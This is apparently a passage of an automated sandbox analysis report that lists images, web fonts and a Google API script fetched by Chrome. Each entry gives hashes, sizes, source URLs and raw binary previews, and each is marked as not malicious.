                                                                                                                                                                                                                                                            SHA-512:FFB9936358203584B492681565F36AC0453A86DBA44FCF4891556703CDC0B3DAF41796D1ED507F885932770390D2553925E9CC813EA809994E222245591F0679
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/3l4wROvUwcnbW_GsR0BdH1f--Wd9SIagmwpo9_C-5xUynH6zITpBwx_acG3e0TUNpmfEOsRneH-q-E3CmnVfjxKlnN3JdeI2rCQT4JI=s660
                                                                                                                                                                                                                                                            Preview:......JFIF.....................................................................................................................................................................................................S............................!."1A.Qa#2q.B....$3Rbrt....5CSs....%4D......E...Tcd....................................H........................!.1AQ..aq..."2...BRr...#3b...4.....CS.$.c...............?.......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 64 x 64
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):22232
                                                                                                                                                                                                                                                            Entropy (8bit):7.686182077506593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:p34PntB8eGJuI7tq8ETwIYD+ucPFRxLvBXxGiYDFhDMf4xZg+oB8qe35:p34PntB/GJuqdEMI2+DRZvBXx0DFhDDb
                                                                                                                                                                                                                                                            MD5:099D8B46FBB6BA808F6F4B027BAB82C8
                                                                                                                                                                                                                                                            SHA1:82669B356EDB3FC444C7EBC3175BEB232F45BEC0
                                                                                                                                                                                                                                                            SHA-256:DACD0E50D9482B01B3193748836D9C21909455A72520189D1B5DB2824B8B2426
                                                                                                                                                                                                                                                            SHA-512:5D7E845977C8E71C633FDBED22FF5F77FA5670B6AFF6585ABC1D287730D2C540C921FC44E0669E6B10E72BBDC99C7A331666ED2B68B9C44AFC5B331389D6EF3F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89a@.@....8.G.....d+r.E.........0)...../...S.\g.k$.8N.....................0.......o......5...........;x..um....{.PL0v.H...pid..Z.&E..{........(#;..-.A.......6/3.G...RJ..{1.........(# h...........0(..I9.6..........:.Nw.{.b[.........5.@.$".....&.P&.<q./.......EB.v.0..)........(...b];...m............"Fy..,,.:6..P.....3n...x.7....<..B...A.Q$.6...).N....ZY._..E?..S..:.........!...<...,....@.@.....}........................................................~.................................}....}....~.}.. .U.....9..}......C...$....#.M..*J..a. 7.t.!...>....B.c.>..8p....B... @.@...>>I.....::...@.,......#...I(H...5i..gq...X. .. ...E........G..... .!.X.n.....b..AS.[..i....m...O.HV....Yo...7.."...F...o%K.....w.i....d.._...r6...l=..B..T.S..)`F......I.... P.T.&}Cb....T@^.K...|.PN...:.$@.=|..V...4. .H4PCB...@9` B{...B...h.:.>C.:..7.B.]. ."a. .H".&..M.*R.b....32..@6...<...@.).DV...!.......,....=.................~...}...r...........f..f...#n..,....5....U./.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x238, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):223695
                                                                                                                                                                                                                                                            Entropy (8bit):7.741067817232325
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:aRNRNRoD/G3VAW9Zi600000T5Z5+5+54F+DoL6K85/:aRNRNRyGFANIIK+kd8l
                                                                                                                                                                                                                                                            MD5:5240F30B825804985787A8FEF9AB3FAF
                                                                                                                                                                                                                                                            SHA1:CF0660B5C62A6BC4ABD4A00D04A9AB2F02B826F8
                                                                                                                                                                                                                                                            SHA-256:9726CA0579FF0FAC38F826AFE5CD2DF2DC0846492C2CE9FCAD49B64FDF548785
                                                                                                                                                                                                                                                            SHA-512:53EE47E99FF7FEB48787B23F560172E4CB278DA05246805181E36E15343F4F90B453A84121BB0AF4C380AAABEA8A4D2F0D17BCE1F9EF290F084DC81A0BEC31E5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa......ICC_PROFILE......XKCMS....mntrRGB Lab .........2..acspMSFT....KODAsRGB........................KODA................................................A2B0...D...4bXYZ...x....bTRC.......B2A0......jcprt.......Gdmnd...L...wdmdd.......[gXYZ... ....gTRC.......lumi...4....wtpt...H....desc...\...zrXYZ........rTRC.......vued.......Fview...4...$mft2.....................................................g.......6.....Q.......O.(...........-.W.......k.....I.......\ .!.#.$X%.&.(.)A*x+.,.../I0{1.2.4.576d7.8.9.;.<6=^>.?.@.A.C.D:E\F}G.H.I.J.L.M5NQOmP.Q.R.S.T.V.W.X3YIZ_[t\.].^._.`.a.b.d.e.f'g6hEiSj`knlzm.n.o.p.q.r.s.t.u.v.w.x.y.z.|.}.~..........!.$.'.).*.,.-.........-.,.*.).&.$.!..........................................w.l.a.V.K.?.3.'.....................p.a.Q.@.0................~.k.X.D.1..............v.`.J.4.............{.c.J.2............h.M.3...........v.Z.>."...........u.X.:.........g.......6.....Q.......O.(
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 28288, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):28288
                                                                                                                                                                                                                                                            Entropy (8bit):7.993545548481223
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:768:MJDKJA5uoN/hxubA7/2GW5EDDL7pSUnd3Jp:MMC//hxz7+p5ipbnJJp
                                                                                                                                                                                                                                                            MD5:53B5E785DFDCA21FA7ADF7119FA1F8CC
                                                                                                                                                                                                                                                            SHA1:A3A86DFD216AD29183BA5493AE39D45B62F9D8B8
                                                                                                                                                                                                                                                            SHA-256:4A6FAB14BFE7B33FE5DC5349A2BB3720037E0ED7EBE621B352340F9514D83C08
                                                                                                                                                                                                                                                            SHA-512:615020BBDCAEC3B8E7FB0FD2B8C5CDAF3C4013C9323B6884FDAED5151788E213260C01C7CCD766898EE91612AB6163150167F9CC7109700B571B546E39F7CB41
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjIUvQ.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......n.......!...n...........................0......"?HVAR...`?STAT..'..../<.............0..^.6.$..F. ..>. ..[..q.v.uaFoV.B.52.L7. w+.I...D..5l...OL*ch.}R.A......HA.0.6G....L...Rk.9.T.>HI....z.F...p..V.b..C..%.!....Q.7L....x.V.bf..s..[M.K)...v.J......=}-....6...I.~..G\`p.i...%.eTX. 3...E.0..?..w|03c`&...."..."e=y..?..U.t.3....?.s.h...=Ir1...I.A...bZT>....PQ.......sjT..R.A.r....H8hXb.3..I....'../.......<J.EJ.%.....x...?...|...T.v..+l.'...6.:....|sl...>.....$,Y.;.`.8...U@....'pq.....=..2M..v...%Z.....N....5......:9.m...!f...I.....H..._~..Elgh.."v.e..|. ..t~.Q.#.....-..P....4.z..e..waZ...z...d.....V......Ry..e.?y.s......J.P...g.1.^..M..v@....E:..|..L_...KR.+~F.G.......9;5VbZS...`..8^Hq..~lm..jzq.1B.2~.......%.....*.....0....s.....n....R1A,...+.~$.a.7.c.........F..BJ..;.:!.'..$..(.....`../U........p.#(/.>'......'.6...n.....Rr.P.@.....`X7...@..t.FS%.r..M.,iR..%W..W.#%{g99.6N..8.........R..^...@:.PU.....).r..dv.@.+..U....<...........62#*#..I.h..7t..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 22328, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):22328
                                                                                                                                                                                                                                                            Entropy (8bit):7.989676730041358
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:raoMEwIarzmGRoqmzrLOcSFVZLmkK6sHRRigNK3q65NPjEliBhxwQwmVnw3504vc:racnq1oNvLOcIVZKXfTaq63IShDweHq2
                                                                                                                                                                                                                                                            MD5:9165BA7B3687276E66C3186C12422172
                                                                                                                                                                                                                                                            SHA1:D251E596A1D8527FC95F5633414F2D515BEB96E7
                                                                                                                                                                                                                                                            SHA-256:57A93F25313D9364F1E93AECEDAF6FF3AA78D933BA15D38573029BFB7EBE19F2
                                                                                                                                                                                                                                                            SHA-512:7ABB7F411BC5890E63A5606F2E202892D6A5DC4E0FF0BA81EDEB75D76396DEB372446EDD8EFC3597C6FDB325A3F60B36F414580754EB0C9A4E1CCA9258C730D7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiQUvaYr.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......W8..........V...........................T..P..0?HVAR.u.`?STAT..'...R/<.....t..1..8.0..`.6.$..l. ..>. .......x....I4.-Pn.....KR%...a..y.X^....f5...#.".D.:.?H.x....)T'|r03.Q.j...N..a.7W.e....Om.-...k..|L......:.(..5....*....h.J6D.."...........&y3.T&R.+.Y...)T...hn....D........m....l.F..B?V.......V..e}.|..MuV..;.>.I!0.Ia>H..`>..$.Iv.......]T."H. @f.{.....M.E.Ee.]Q5....[...j.&i.~.x~..(..X...P.....s..evy..H..`Q...'jdEM...7....b...N5M.U.Y..1..%.K.j.Kt.\;.l.....)..#.p.3[..:t.@...N.(...L.J.........c.,..Mh2y@...6....z.!.kzU.....?.....o....5..../9}........s!..!$..2...V7..nv.#.Gh..].Z@yS....].R.c.]H...!U...tQ..*Tv.t.t....J...T..&..U..t..\...w..+...Z.....!L>t0.....j.fC..L..*f..d?n.m................2.EW.JW....M......2M.o..n.$.<...B..6PK...b&S.'.8..R.n..0.0..?....mu.{.R..(.5.......}t........b.J.O.xl.. .Xe..2?.|.$LJ?\6..U; _px ...`.......!.W..4..P>....0.b......*VArxr.nU....E.$.......X..c..'..$.....KW.Y.ac|..v.8./W..0.O3.................V\..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1000 x 400
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):194994
                                                                                                                                                                                                                                                            Entropy (8bit):7.9647903598937875
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:3ZdgiWbCp95yo5Ebk9cjZwHHg3f6rJeR5L8n3KqZz0jW2Sb38H4dHZTHhBF+Qw08:JdgUXH53cmHHkQJeR5LY3KqheI8Y7hBq
                                                                                                                                                                                                                                                            MD5:C4BF058F7E5B2AA86D5627EBC9721DAD
                                                                                                                                                                                                                                                            SHA1:51686599D5744A29B734934A5C87077895867920
                                                                                                                                                                                                                                                            SHA-256:DB3AEDBC0210E0734E727BA917335AAC605BA85DE987E622BA30C921FEC77A9D
                                                                                                                                                                                                                                                            SHA-512:6A728762D289049C1A3EDB983D17A07172F6D8A434B141588D5A9E01BBF9E8E6A1CD31B4E6FE961B89C9A7BA7C9D2A6C749E9960892C0340254D830ADE0607D9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89a..........Y...4.G..$......j.I...h"........d..1......(..q.....q..........{.......y.Y..R...|...(......*...........|....i..G..9..c..t...Q&Y.........q.....k.j...u......vT....*.....0..u......(.......r..1..:........9T.....b...m....0......E..mM.gf.y.......ePb...Y..K...qw....HPo...u...........<.....}.......P...+58..w...q.c..3...}..B[2....'O....q...Sp..!.......z.s...........|bu..E.....0.....-j.@.................u...m...a...f...1E.s.....}.m..7........{....Za....e>.~.t...^>...Kb.3........y............$......#;......L.._..9...[1..........y..........q...=....8X.........y..<....................4........+........|..?.............. ..r..!...u..a..............................................................................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="h
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x299, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):45758
                                                                                                                                                                                                                                                            Entropy (8bit):7.9314404503062805
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:ft+1XmOH7lDjO486TdzuWT2+UgLmXTSrOJSFJHiJggMW/u7MUZI69:ft+PbodiEClxLasFJ8gRz7pZZ
                                                                                                                                                                                                                                                            MD5:DB6D21F32759A4D00CA2E38244F4E718
                                                                                                                                                                                                                                                            SHA1:1439C2EB4B4CC647778A0E630B63C646C6A96025
                                                                                                                                                                                                                                                            SHA-256:F8013084FA3380269614BEA96BE844BDD28528455B028CD457B5F36E52DD1C2C
                                                                                                                                                                                                                                                            SHA-512:8EBB58F6CEEE53FD0DC7B8EF267D9D8266AFC2DEC9C04971116A8D0254EF9D6593AB5CBD623C6B92D86A162E065D3F054AA65869EC16CA33121BC007B55037FE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/effFMzq4XvfrZPK0E_tvDivy7b-Kd2-Cmd8TvA-maCZK35whczbTdegzCTQBeA46bhHMIy0Eujntwy2v9vqSBDu-_nT-8eZJerDmkwpV=s660
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa.....@ICC_PROFILE......0ADBE....mntrRGB XYZ ............acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 1999 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../................................................................................................................................................+...............................................S.........................!1...A."Qaq...2....#3B...$Rb.rs...%CS....t.4Uc........ET..................................J.......................!1..AQ..aq.."2......#BR..3br..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 4924, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):4924
                                                                                                                                                                                                                                                            Entropy (8bit):7.951833409122959
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:ObTGgewjz5RrXFpuoDKNUEKCM3RiM826IP7K:ObpxUAhj3Ug7K
                                                                                                                                                                                                                                                            MD5:3A941FC72BF9E9786320389B5E7FED6F
                                                                                                                                                                                                                                                            SHA1:A27BCE58BA261EAA37D538FBD7A0984414E8E4AE
                                                                                                                                                                                                                                                            SHA-256:F3A5EA76A1AF88E638AEBB15539E7DB15484C87D405309492D5A92A2FEC85849
                                                                                                                                                                                                                                                            SHA-512:C118B841435A69C0D5594FACDC441E98A392D63EA0D746AFEBFE3AD7C424C8166D021AFE7D86C6DAAA10B8829B9F5DCC22E01276735402C541488D8D165FD2A7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesanstext/v21/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTnmtjtiu7.woff2
                                                                                                                                                                                                                                                            Preview:wOF2.......<......+..................................d..`.`..:......B..^..6.$..8. .....:....%EFm7iU<..O...q.q-M..Q.6%.E...DeC7jl..S.....0'..L?4.....wYt...K...}.?q.$.<|?...0.......K&I=...t....>\?r..U.HUs.J.....IxL|..K......o..#...YAX..B@..v3.l.b.......H~E l..`..O.....$.......vp^...2....r.O7..?6S.$%.!. Q..C..El*7...M.&v.,.....o:@..~T,.Y...%..1i..........@6{a.1..uO......p...f7......]E...d.~"T..#..v.!.a...g...G..q..b.1..._.B.........(.b.x... .A...(.b...i..3.A,V....b%..j...$... 6.Cl.....h0.4..G..4..K...*.......:.E .o...?....t*.<Wa.P1...1.....!.!4-..ISc1X,..&.K..)..>...e3PA,.G...Y!.T.\.v..s.Y#U" e}...G..s;5..Z....C=Osp..48`.....]......P)~G.....@.....f...H.C. .~.#..]j..P.....Xq..qA....N.g\...t2...%..@...6cf.... .d..s....}P..f..C.S1.dA.S.3W...b..{...j.q=...E.`.4........4...;.O...b.<Q.4vZ...6k_.*b.(..B..l+Q....l2.Ue..<....B*.3..sE.b...d..H_:....L..D.+..%^u.....f..W%.A$Y.ti../_....l......1..?.wh......de!.KEH..ZpN.........+QP|o..[.<.!...o.s..."|4..7.....m
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 850 x 250, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):14589
                                                                                                                                                                                                                                                            Entropy (8bit):7.945522019911137
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:l+aUZOeInaJ9obSgvEIEzEPyQvkogkrVqOs8RdF81obX/8DSMt02OJ:lAZxI1b/TEzIkGhqOzu1ojWSC0l
                                                                                                                                                                                                                                                            MD5:5E5848739169BCAA9BA5E40FE5EBF710
                                                                                                                                                                                                                                                            SHA1:DE8C33627287A24FECE030C39A9270BDF37AE99F
                                                                                                                                                                                                                                                            SHA-256:95F2122A0FDEB006BDF1B752AEB4444E5DD48C5288029CEE224E4C439DFA8D13
                                                                                                                                                                                                                                                            SHA-512:3B2839A6706D4416969211939C8B8F09F60EE639C5EC8E28DEDCF897D0CB3731FA1D8061234D4C538E3DDD3926D422F3F6E17F4D197998D53C04EFA5409F9A00
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/inputtools/images/ita_sprite8.png
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...R...............8.IDATx...!.. ...W...-H@24..................................:.F..f....n#.....v.G..f4/..8...............l...5.rr....V.v...j4m...>. ..~...l'.1.r..%<Q....D..%D"...1...........%B<.......S.i.T..4...N%..C...L....SO.}..'.{.fW...r..zn..H.Z....|......a{..[.R..."W.*../&R.r....z"M[.g6.......\........p.....:Z...<...\r.=ID. ].e.v..h\.I".....|..|..B.xz.s.s.F...1.I......G.<....,&.z......e...........]..;..M...p.........5..]dt....b.H]i2..h.(..g...4.....m.D#$i.<4{..'......8z....0.R.4.4$..M)..<...A..h.".y.....4i...RJ.R...d.QC.Zb...q.pH2....g..X.4^..~. ..f..7!$Ig.5.G......B...E..._.E.f.'P.....M.E.gSN...*j3e..^.tx..!..J.s.Z...S..s..g.9.V3..h._+m.D.-3..E.aZ&.L.*....#x".$q=.I.]4+HG.'...~..}....u..(|....@{.RL.Eh. ..,.5>....y..)G....zF.y.....#.h.df...-..8..=...4...."..%+...O..Q.P.|k.~.;.'....l.$........?Ul..T....&8.Dx`hy..2..WZ...T.......Dm.v.......D...kK5.y..!+.....>..O.b..c3u.....h..<.i..8-.....p.H.74...n.9.1>..<J1..x..D..i....MG...
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1445)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):113693
                                                                                                                                                                                                                                                            Entropy (8bit):5.499618224568006
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:DI1yvjZkIwGRKvPaF34N3LWwr4/ecI1kzEj:DEyeGRdzwyAkzEj
                                                                                                                                                                                                                                                            MD5:AB4929E07CA474F25A80FB6DE06B8825
                                                                                                                                                                                                                                                            SHA1:E84AFEC2B54A74F5EF53A2FDE492887A5257931C
                                                                                                                                                                                                                                                            SHA-256:0674D7A70C47E6894EC3B635835C6068429C925B500B25787E93778BC722C9AB
                                                                                                                                                                                                                                                            SHA-512:A9A2CAFC5153C7C43AD38E933BAB4F15A530F5B309599336A5B766AFBF006CF9005C47632D8793F38433AF504CC8C8BE57E8422B39ED84586A6A5E21F2219BF5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.yHsE3XoyXLE.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8LDClD0V3IE-5SJcudVO91TD73Qw/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                            Preview:gapi.loaded_0(function(_){var window=this;.var fa,ia,ja,ka,la,oa,ya;_.ea=function(a){return function(){return _.ba[a].apply(this,arguments)}};_.ba=[];fa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ia="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ja=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};ka=ja(this);la=function(a,b){if(b)a:{var c=ka;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ia(c,a,{configurable:!0,writable:!0,value:b})}};.la("Symbol",function(a){if(a)return a;var b=function(f,h){this.ET=f;ia(this,"description",{configurable:!0,writable:!0,value:h})};b.p
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1000 x 400
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):160610
                                                                                                                                                                                                                                                            Entropy (8bit):7.931370578246458
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:1YVwQEBCpMQZKP041bVmHaPI8I7lOS5vR7ZNcx9ujOdBYmAmqe8TB:6mYBKP0418NB7lOUlTjKzAmZ8d
                                                                                                                                                                                                                                                            MD5:A228CB279B9AFDDB2973BEC55F5EFE01
                                                                                                                                                                                                                                                            SHA1:9EDEE902536FECD4767EDB2B2DECDDE8CBE0C0F0
                                                                                                                                                                                                                                                            SHA-256:6108494DC1073A262D685A8AC67C65699D8420A55E374A934A3128FCAABFD58F
                                                                                                                                                                                                                                                            SHA-512:A16C44A28ACBC360265ADF20FF213C896E0A0B2AA0BCEE794CBBCD52C796623B8592F35A7C749E1461B98B1D7B1D245E850540B5CE2BB4A140E8423A38CD529F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2020/tunisia-national-day-2020-6753651837108322-2xa.gif
                                                                                                                                                                                                                                                            Preview:GIF89a.......m..q.....Lt.Dl............`.....T|..Xe...*X.x.....Px..........Y........].....i.....Iq.Aj...Lt..........t.....<f.v.............k)U..4.............@.........Hp........p.Rz... S}.}..................._...........f.....Pw...w......;K......X.....c...........X...(6f..Fo.......|.......V~..........r..........\..i..e.....K....k..p.............e..Nv.[.....z........j..[..a..Ip...V...................Jt.W~.Lr. O....U|.......w..Rz.Cn.Tz....Fn....u.....b......'>h.....Mt.]..}.....m....R|....u.....Fn.Jr...m..........Sv.p..Z...........y.....h......y........p..........5`.........t.............n..l.............................................................................................................................z....................|...........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x960, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):160860
                                                                                                                                                                                                                                                            Entropy (8bit):7.9747186136275054
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:czbUg3anuNClCc0wCGJDPk1AsNJ/dwKaXlN/cU2Z/uU0zoMBIfgVtndJny:cvUgKuNG0wbJQVGXm/SBIITnvy
                                                                                                                                                                                                                                                            MD5:61A45740CD8E3DD816BF74A9180A9645
                                                                                                                                                                                                                                                            SHA1:545EF860DF00F4F9989A4369CD60181914AFD0C5
                                                                                                                                                                                                                                                            SHA-256:8C646C7E2282D208E628BF35BF8B1597B0F61E94648CEF907AD3A46053AD2498
                                                                                                                                                                                                                                                            SHA-512:C943AF054F7E09C61D142CA2E54DA684972AECFE1A4C96027F9989FFEBE947A139F76653F404C22F2E78E4430524092ACD5EAD5278842E775C8FAF1FF2B6E3B8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF..........................................................................................................................................................."........................................._..........................!.1."2ABQR..#..3Cabqr.Sc..s........$........D4...%Tt....d........5..................................A.........................".!2.1B.AR#Q.3abrq.$......C........4..............?..5.Z../..1.....hR."V-..hQ......%.\.M:.hK.....BA.&Sb...ZURt..'..s.......=fp..Y.u.....!)..f.BC.k.P...~.3......=$}.q..:.~.@.......nn.xng..Z..AX../.0X.Sb...33...\...(....b..J.#B.J..h.V........n....4,K.Bq.X../BAD,K...jKJ.B.JRZ......%....#Z.{2....;..d2.A...J..aUu..c.v...+.....f.K+..x.^=..m:.jq.,...E..vX3...G.........[......S.Yn..~.d.........4.l...P...`.,.ke?5.G/N.C{+c......r.k._F.d.4..(.V.#..P\..*Fy_dC..f~K..-v.1.."GA6.D(.V}.~.k6.~.R.\..]....Vd......=.|4........d.2u........".#..Yt.7.G1.cC...uT+6..V...o..u5...@p..r..P.1 ....Bjs.1i......T.$.....D..QZ...
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 31568, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):31568
                                                                                                                                                                                                                                                            Entropy (8bit):7.99179193151151
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:768:nV/PrFLvj4faRm0uZd9N56pGyOPRA3Y8NyjZ:pPrFbjU0m0Qd56pYA3YUa
                                                                                                                                                                                                                                                            MD5:EB11BFB369775FF0739DABB3A5F379CC
                                                                                                                                                                                                                                                            SHA1:2EEBAEA2F7080C0B256FBFC70AB91473243AF0F8
                                                                                                                                                                                                                                                            SHA-256:2E0BDC192134BB3950A1BA4C1148901E39EBD8D2D01F64EF23106E90A9F771B0
                                                                                                                                                                                                                                                            SHA-512:59E89752E932AADE54D5B2B940E09F3C8B12A836F1C5EB515E82036A97492F42E12A4FB3DC156CB8D969D6CB4E8FD8F18B358715F972E12D4596AD390430CB21
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/productsans/v9/pxiDypQkot1TnFhsFMOfGShVF9eO.woff2
